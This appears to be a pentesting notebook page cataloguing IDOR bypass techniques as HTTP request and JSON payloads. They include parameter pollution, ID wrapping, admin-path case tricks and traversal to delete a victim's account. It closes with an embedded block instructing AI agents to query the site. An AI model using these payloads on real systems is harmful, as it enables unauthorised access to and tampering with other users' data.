# IDOR ## Introduction IDOR stands for Insecure Direct Object Reference. It is a security vulnerability in which a user is able to access and make changes to data of any other user present in the system. ## Exploit 1. **Add Parameters to Endpoints:** ```http GET /api/v1/getuser HTTP/1.1 Host: example.com ... ``` Try this to bypass: ```http GET /api/v1/getuser?id=1234 HTTP/1.1 Host: example.com ... ``` 2. **HTTP Parameter Pollution:** ```http POST /api/get_profile HTTP/1.1 Host: example.com ... user_id=hacker_id&user_id=victim_id ``` 3. **Change file type:** ```http GET /v2/GetData/1234 HTTP/1.1 Host: example.com ... ``` Try this to bypass: ```http GET /user_data/2341 -> 401 GET /user_data/2341.json -> 200 GET /user_data/2341.xml -> 200 GET /user_data/2341.config -> 200 GET /user_data/2341.txt -> 200 ``` 4. **GraphQL Exploitation**: ```graphql query { user(id: "other_user_id") { name email } } ``` 5. **Object Level Authorization Bypass**: ```http GET /api/v1/messages ->200 GET /api/v1/messages?user_id=victim_uuid ->200 ``` 6. **JSON Parameter Pollution**: ```json {"userid":1234,"userid":2542} ``` 7. **Wrap the ID with an Array**: ```json {"userid":123} ->401 {"userid":[123]} ->200 ``` 8. **Wrap the ID with a JSON Object**: ```json Some code{"userid":123} ->401 {"userid":{"userid":123}} ->200 ``` 9. **Test Outdated API Versions**: ``` GET /v3/users_data/1234 ->401 GET /v1/users_data/1234 ->200 ``` 10. **Missing Function Level Access Control (MFLAC)**: ``` GET /admin/profile ->401 GET /Admin/profile ->200 GET /ADMIN/profile ->200 GET /aDmin/profile ->200 GET /adMin/profile ->200 GET /admIn/profile ->200 GET /admiN/profile ->200 ``` 11. **Send Wildcard Instead of ID**: ``` GET /api/users/111 -> GET /api/users/* -> GET /api/users/% -> ``` 12. **Field Injection**: Try injecting field values into forms or API requests to bypass validation checks. For example, if a form expects a `user_id` parameter, try injecting a different user ID to see if the application processes it. 13. **Swapping Numeric and Non-Numeric IDs**: ``` GET /file?id=90djbkdbkdbd29dd -> GET /file?id=302 ``` 14. **Path Traversal**: ``` POST /users/delete/victim_id -> 403 POST /users/delete/my_id/..victim_id -> 200 ``` 15. **Change Request Content-Type**: ``` Content-Type: application/xml -> Content-Type: application/json ``` ## Tools for Parameter: * google dorking * arjun * paramminer ## Resources * {% file src="/files/ZtdhiFL8hKU2Nx5Y7lRO" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://shahidulandshamim.gitbook.io/web-application/exploitation/idor.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.